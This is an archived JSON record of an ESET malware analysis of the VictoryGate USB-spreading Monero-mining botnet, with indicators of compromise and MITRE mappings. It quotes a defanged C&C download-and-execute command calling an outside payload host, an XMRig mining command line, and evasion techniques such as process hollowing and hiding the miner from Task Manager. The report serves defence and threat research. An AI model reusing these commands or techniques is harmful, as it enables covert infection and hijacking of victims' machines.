{
	"id": "096bd512-44cf-45e2-ba77-d2bbfcf5f483",
	"created_at": "2026-04-06T00:06:27.748952Z",
	"updated_at": "2026-04-10T13:11:54.233163Z",
	"deleted_at": null,
	"sha1_hash": "7c2b5ca272789e45497c49601ed98c385653f9e6",
	"title": "Following ESET’s discovery, a Monero mining botnet is disrupted",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 499323,
	"plain_text": "Following ESET’s discovery, a Monero mining botnet is disrupted\r\nBy Alan Warburton\r\nArchived: 2026-04-05 14:34:43 UTC\r\nESET researchers recently discovered a previously undocumented botnet that we have named VictoryGate. It has\r\nbeen active since at least May 2019 and, since then, three different variants of the initial module have been\r\nidentified, in addition to approximately 10 secondary payloads that are downloaded from file hosting websites.\r\nThe initial module is detected by ESET security products as MSIL/VictoryGate.\r\nThis botnet is composed mainly of devices in Latin America, specifically Peru, where over 90% of the\r\ncompromised devices are located. We’ve been actively sinkholing several command and control (C\u0026C) domains,\r\nallowing us to monitor this botnet’s activity. The combination of the sinkhole data and our telemetry data allows\r\nus to estimate the botnet’s size to be at least 35,000 devices.\r\nTo control its botnet, VictoryGate used only subdomains registered at the dynamic DNS provider No-IP. ESET\r\nreported the malicious subdomains to No-IP, who swiftly took them all down, effectively removing control of the\r\nbots from the attacker. Also, ESET is collaborating with non-profit Shadowserver Foundation by sharing sinkhole\r\nlogs in an effort to further remediate this threat.\r\nIn Figure 1 you can see the peak number of unique IP addresses connecting to the C\u0026C per day.\r\nFigure 1. Connections to the C\u0026C\r\nThe main activity of the botnet was Monero mining. However, given that the botmaster was able to issue\r\ncommands to the nodes to download and execute new secondary payloads at any given time, this could have\r\nchanged at some point. This posed a considerable risk, given that we’ve identified compromised network traffic\r\nthat stems from the public sector and from organizations in the private sector, including financial institutions.\r\nThe impacts on the victim’s device are:\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 1 of 11\n\nVery high resource usage. In all the payloads we analyzed, the malicious code uses all available threads to\r\nperform cryptomining, which results in a sustained 90-99% CPU load. This slows down the device, causes\r\noverheating and possibly even damage.\r\nFiles that are contained on USB drives are hidden when connecting to an infested machine. This is part of\r\nthe propagation mechanism that we’ll discuss shortly.\r\nWe’ll cover some of the technical aspects of this threat in this post.\r\nWhat is VictoryGate?\r\nThis is the name we’ve given to the initial module that receives and executes commands from the C\u0026C server. It\r\nalso implements the propagation mechanism and establishes persistence on victimized devices.\r\nPropagation\r\nThe only propagation vector we have been able to confirm is through removable devices. The victim receives a\r\nUSB drive that at some point was connected to a compromised machine. It seemingly has all the files with the\r\nsame names and icons that it contained originally. Because of this, the contents will look almost identical at first\r\nglance, as seen in the example in Figure 2. However, the original files have been copied to a hidden directory in\r\nthe root of the drive and Windows executables have been provided as apparent namesakes.\r\nFigure 2. Comparison of a drive pre- and post-compromise with default Explorer options\r\nIn fact, these executables are AutoIt scripts that are compiled on the fly by VictoryGate, using the template in\r\nFigure 3. It is worth noting that the build process will also add random metadata to each file so that any two\r\ncompiled scripts will most likely never have the same hash.\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 2 of 11\n\nFigure 3. The template used by VictoryGate to compile the propagation scripts\r\nWhen an unsuspecting user “opens” (i.e. executes) one of these files, the AutoIt script will open both the file that\r\nwas intended, in addition to the initial module (see Figure 4), both hidden by VictoryGate in a hidden directory as\r\nmentioned above.\r\nFigure 4. Propagation script that shows launching a regular file along with executing the malicious module\r\nOnce the initial module is executed, it will create a copy of itself in %AppData% (with a nicer name like\r\nctfmon2.exe) and a shortcut in the startup folder pointing to this copy, as a simple mechanism to gain persistence\r\nupon system boot.\r\nThis module is an approximately 200 MB .NET assembly that contains a huge array with garbage bytes. This is\r\nlikely done to avoid scanning by some security products that have file size or other resource consumption limits.\r\nThe array also contains an XORed and gzip-compressed DLL that, at runtime, is deciphered and loaded with a late\r\nbinding call using the .NET Reflection API.\r\nThe DLL itself contains a packed AutoIt-compiled script like the one seen in Figure 3, as well as the methods\r\nrequired to inject it into some legitimate Windows process. We’ve seen vbc.exe (Visual Basic Compiler) or\r\ncsc.exe (Visual C# Compiler) being targeted.\r\nThe injection is done by creating an instance of the vbc.exe process in a suspended state, unmapping its memory\r\nsections and then loading the executable from memory. As can be seen in Figure 5, VictoryGate will use several\r\nundocumented NTAPI functions such as NtWriteVirtualMemory, rather than using the more common API function\r\nWriteProcessMemory, to avoid basic API-hooking detection.\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 3 of 11\n\nFigure 5. vbc.exe process injection performed by VictoryGate\r\nThe injected AutoIt agent is responsible for communication with the C\u0026C server, download and execution of the\r\nsecondary payloads, and also will constantly scan to detect whether a new USB drive has been connected and, if\r\nso, will replace the files that it contains with propagation scripts and hide the original files.\r\nCommunication with C\u0026C servers\r\nAs mentioned before, the botmaster had the ability to send commands to the nodes to add new secondary\r\npayloads. These commands were issued using a custom protocol and uncommon ports as cleartext. The following\r\ncommands were supported:\r\nCommand Description\r\n!\r\nThe C\u0026C tells the node to download a file from a given URL and then execute it. The node\r\nwill also use the prefix to notify the C\u0026C that the task has been completed without errors.\r\n~\r\nThe node uses this prefix to notify the C\u0026C that there has been an error while performing the\r\ntask.\r\n-\r\nThis prefix is used by the node during the first message to the C\u0026C, where it sends information\r\nabout the system such as username, hostname, antimalware product installed, AutoIt version,\r\netc. After that, it is used as a Keep-Alive between server and client.\r\n_\r\nThe node notifies the C\u0026C that the current execution path is different than the one expected.\r\nThis will also trigger the same mechanism that is used when the file is executed from the USB\r\ndrive – it will copy itself to %AppData%.\r\nHere is a defanged example of a download-and-execute command:\r\n!|N-I-C-H-O-L-A-S|!|N-I-C-H-O-L-A-S|PuQPQOZOy.exe|N-I-C-H-O-L-A-S|http://gulfup[.]me/i/00711/2czcy5xvh7br.jpeg[N-E-K]\r\nwhere the URL is the payload to download to the %temp% directory and PuQPQOZOy.exe is a randomly-generated name to be assigned to the file once it is downloaded.\r\nDownloaded payloads\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 4 of 11\n\nDownloaded payloads are typically AutoIt-compiled scripts as well. The AutoIt compiler has the ability to bundle\r\nbinaries with the script, in one standalone file. These binaries can then be executed by the script using the AutoIt\r\nShellExecute function when the compiled executable is run. When executed, this file will first create a scheduled\r\ntask and another shortcut in the startup folder to gain persistence for this new binary. The execution of the\r\ndownloaded payload in most of the samples analyzed is the following:\r\nFigure 6. Workflow of the downloaded payload\r\nAgain, this payload will try to inject code into a legitimate Windows process; this time it’ll inject the XMRig\r\nmining software into the ucsvc.exe (Boot File Servicing Utility) process.\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 5 of 11\n\nOnce executed, tpmvscugr.exe will first decipher a Rijndael-encrypted array, which is a packed binary that we call\r\ngate.exe – its methods are then invoked using the .NET Reflection API as seen in the previous stage.\r\nThis packed binary doesn’t have the necessary code to perform the injection itself; rather, the last piece of code\r\nrequired to inject the ucsvc.exe process is a DLL downloaded from the C\u0026C that is first stored in a registry key\r\n(see Figure 7) and then loaded into the tpmvscugr.exe process memory during runtime.\r\nFigure 7. Registry key containing auto.dll\r\nThis DLL (auto.dll) is sent through network traffic using gzip compression and AES encryption. The key to\r\ndecipher it has to be recovered from the communication between the C\u0026C and the node. It is then loaded during\r\nexecution by performing a late call. It contains some typical RunPE functions that allow gate.exe to perform the\r\ninjection.\r\nMonero mining\r\nOnce the ucsvc.exe process is injected with the XMRig miner, the C\u0026C will start the mining on the node by\r\npassing a command like the following:\r\nC:\\Windows\\system32\\ucsvc.exe -algo cryptonight -url \u003cRedacted\u003e:19019 –user CPU_x64 –pass x –retries=50 –\r\nretry-pause=1 –keepalive –donate-level=1 –nicehash\r\nThe IP address seen in the command is actually not a mining pool, but a stratum proxy – or XMRig Proxy. Also, in\r\norder to hide the CPU usage from the user, the mining process will be terminated if the user opens Task Manager;\r\nmining will be resumed as soon as TM is closed. This technique has been seen in many other threats of this kind.\r\nFrom the data collected during our sinkholing activities we can determine that there are, on average, 2,000 devices\r\nmining throughout the day. If we estimate an average hashrate of 150H/s, we could say that the authors of this\r\ncampaign have collected at least 80 Monero (approximately US$6000) from this botnet alone.\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 6 of 11\n\nConclusion\r\nVictoryGate is a new botnet that uses USB drives to propagate, a technique that we’ve seen repeatedly over the\r\nyears in Latin America. The usage of AutoIt and XMRig to develop cryptomining malware is also a trend that has\r\nseen a recent increase.\r\nOne of the interesting characteristics about VictoryGate is that it shows a greater effort to avoid detection than\r\nprevious, similar campaigns in the region. However, the most interesting factor of this investigation has been our\r\nability to register unused domain names hardcoded into the malware samples, allowing us to sinkhole a significant\r\npart of the C\u0026C infrastructure and share the collected data with Shadowserver in order to remediate this attack.\r\nNo-IP was also helpful in taking down the main domain names used by the botnet, which disrupted at least a\r\nportion of the botnet.\r\nDespite our efforts, compromised USB drives will continue to circulate and new infestations will still occur. The\r\nmain difference is that the bots will no longer receive commands from the C\u0026C. This will prevent new victims\r\nfrom downloading secondary payloads from the internet. However, those PCs that were afflicted prior to the\r\ndisruption may continue to perform cryptomining on behalf of the botmaster. We provide a free tool to clean your\r\nPC if you think it has been compromised by this malware: you can use ESET Online Scanner to effectively\r\nremove this threat.\r\nIndicators of Compromise (IOCs)\r\nSamples\r\nESET detection name Hash\r\nMSIL/VictoryGate.A 398C99FD804043863959CC34C68B0305B1131388\r\nMSIL/VictoryGate.A a187d8be61b7ad6c328f3ee9ac66f3d2f4b48c6b\r\nMSIL/VictoryGate.B 483a55389702cdc83223c563efb9151a704a973e\r\nMSIL/VictoryGate.C 686eef924e6b7aadb5bcff1045b25163501670e6\r\nFilesystem\r\n%ProgramData%\\JcmewjJky\\jcmewjjky.ico\r\n%ProgramData%\\JcmewjJky\\jcmewjjky.exe\r\n%ProgramData%\\JcmewjJky\\jcmewjjky.au3\r\n%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ctfmon.url.lnk\r\n%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\tpmvsucgr.url\r\n%AppData%\\tpmvscugr.exe\r\n%AppData%\\ctfmon2.exe\r\nHKCU/Software/JcMewjJKy\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 7 of 11\n\nHKLM/Software/Microsoft/Windows NT/CurrentVersion/Schedule/TaskCache/Tree/rwIAMblfuvoss\r\nHKCU/Software/Victory\r\nC\u0026C Domains\r\n* Domains being sinkholed.\r\nscitie.ddns[.]net\r\nddw.ddns[.]net\r\nc0d3.ddns[.]net\r\nvolvo.ddns[.]net\r\nxcod.ddns[.]net\r\nmrxud.ddns[.]net\r\nd001.ddns[.]net\r\nxkm.ddns[.]net\r\nluio.ddns[.]net\r\nxcud.ddns[.]net\r\naut2scr.ddns[.]net\r\nfanbmypersondrive[.]icu\r\nmydrivepersonpdvsa[.]icu\r\nmydrivepersonfanb[.]icu\r\nmycountermppd[.]xyz\r\ncalypsoempire.ddns[.]net\r\nmgud2xd.ddns[.]net\r\naut0hk.ddns[.]net\r\nxcud.zapto[.]org\r\naccountantlive[.]icu\r\nshittybooks[.]review\r\nhakerz123.ddns[.]net\r\njcmewjjkyc0d3.ddns[.]net *\r\nurtyerc0d3.ddns[.]net *\r\nMoOHyAYeuaut2scr.ddns[.]net *\r\npNUMWWDLjPmzg.ddns[.]net *\r\ngJyapcAGoc0d3.ddns[.]net *\r\nOHOFqlXNJluio.ddns[.]net *\r\nPayload URLs\r\ngulfup[.]me/i/00711/2czcy5xvh7br.jpeg\r\ngulfup[.]me/i/00711/a8nr26g1zcot.jpeg\r\ngulfup[.]me/i/00711/6400e1i9fsj6.jpeg\r\ngulfup[.]me/i/00711/pwgzuq5902m2.jpeg\r\ngulfup[.]me/i/00711/lhm3w37zuiwy.jpeg\r\ngulfup[.]me/i/00711/3mwdm6tbgcq6.jpeg\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 8 of 11\n\ngulfup[.]me/i/00712/sy8rtcxlh1pu.jpeg\r\ngulfup[.]me/i/00712/o56zgjhefny0.jpeg\r\nb.top4top[.]io/p_152411ncc1.jpeg\r\npastebin[.]com/raw/fEAuhPYh\r\nMITRE ATT\u0026CK techniques\r\nTactic ID Name Description\r\nInitial access T1091\r\nReplication through\r\nRemovable Media\r\nCompiles AutoIt scripts that replace\r\noriginal files on the USB drive.\r\nExecution\r\nT1064 Scripting\r\nUses AutoIt and VBS scripts in various\r\nstages of the malware.\r\nT1129\r\nExecution through Module\r\nLoad\r\nLoads and runs binaries during execution.\r\nT1085 Rundll32\r\nUses rundll32.exe through the AutoIt\r\nfunction INETGET to download\r\npayloads.\r\nT1106 Execution through API\r\nUses API calls such as CreateProcessA,\r\nWriteProcessMemory to run binaries.\r\nT1053 Scheduled Task\r\nCreates a scheduled task to ensure the\r\nminer will run every minute.\r\nPersistence\r\nT1158\r\nHidden Files and\r\nDirectories\r\nCreates hidden directories to hide the\r\npayload and propagation files.\r\nT1060\r\nRegistry Run Keys /\r\nStartup Folder\r\nCreates a file with LNK extension\r\n(shortcut) in the Windows startup folder.\r\nT1053 Scheduled Task\r\nCreates a scheduled task to ensure the\r\nminer will run every minute.\r\nPrivilege\r\nEscalation\r\nT1055 Process Injection\r\nGains privilege by injecting itself into\r\nlegitimate Windows processes.\r\nDefense\r\nEvasion\r\nT1140\r\nDeobfuscate/Decode Files\r\nor Information\r\nUses base64 encoding and other\r\nobfuscation techniques in various iplaces.\r\nT1222\r\nFile and Directory\r\nPermissions Modification\r\nSets +RHS attributes on files and\r\nsirectories.\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 9 of 11\n\nTactic ID Name Description\r\nT1009 Binary Padding\r\nUses binary padding to create propagation\r\nscripts that have different hashes.\r\nT1107 File Deletion\r\nFiles downloaded in the %temp%\r\ndirectory are later deleted.\r\nT1093 Process Hollowing\r\nLegitimate Windows processes are\r\nhollowed and then injected.\r\nT1045 Software Packing\r\nMany files contain packed binaries using\r\ncustom techniques.\r\nLateral\r\nMovement\r\nT1091\r\nReplication through\r\nRemovable Media\r\nThe initial payload is copied to a hidden\r\ndirectory in a removable drive.\r\nCollection T1005 Data from Local System\r\nSome information about the host device is\r\nexfiltrated, including username,\r\nhostname, antimalware solution, and\r\nothers.\r\nDiscovery\r\nT1063\r\nSecurity Software\r\nDiscovery\r\nPerforms WMI queries to discover\r\nsecurity software installed on the\r\nmachine.\r\nT1057 Process Discovery\r\nTries to determine if the task manager\r\nprocess is open in order to suspend the\r\nmining activities.\r\nCommand\r\nand Control\r\nT1094\r\nCustom Command and\r\nControl Protocol\r\nC\u0026C uses two non-standard protocols.\r\nT1065 Uncommonly Used Port\r\nC\u0026C uses uncommon ports such as\r\n3,030, 6,060 and 19,019.\r\nT1008 Fallback Channels Uses backup domain names.\r\nT1102 Web Service\r\nUses Pastebin to recover the C\u0026C IP even\r\nif DNS resolution fails.\r\nImpact T1496 Resource Hijacking\r\nVictim’s hardware is used to mine\r\ncryptocurrency.\r\nT1492\r\nStored Data\r\nManipulation\r\nFiles stored on USB drives\r\nare hidden from the user.\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 10 of 11\n\nSource: https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/"
	],
	"report_names": [
		"eset-discovery-monero-mining-botnet-disrupted"
	],
	"threat_actors": [],
	"ts_created_at": 1775433987,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7c2b5ca272789e45497c49601ed98c385653f9e6.pdf",
		"text": "https://archive.orkl.eu/7c2b5ca272789e45497c49601ed98c385653f9e6.txt",
		"img": "https://archive.orkl.eu/7c2b5ca272789e45497c49601ed98c385653f9e6.jpg"
	}
}